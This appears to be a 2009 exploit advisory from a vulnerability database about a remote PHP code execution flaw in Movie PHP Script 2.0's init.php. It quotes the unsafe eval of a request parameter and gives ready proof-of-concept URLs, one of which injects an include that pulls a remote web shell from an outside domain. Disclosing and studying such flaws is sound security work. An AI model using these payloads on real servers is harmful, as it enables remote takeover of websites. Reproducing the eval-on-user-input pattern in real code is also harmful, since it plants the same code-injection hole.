Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability

🗓️ 03 Jun 2009 00:00:00Reported by RootType

Movie PHP Script 2.0 Code Execution Vulnerability in init.ph


                                                #################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC : 

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example : 

   http://127.0.0.1/path/system/services/init.php?anticode=include &quot;http://www.darkmindz.com/shell/x2300_mod.txt&quot;;

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# sebug.net

03 Jun 2009 00:00Current

7.1High risk

Vulners AI Score7.1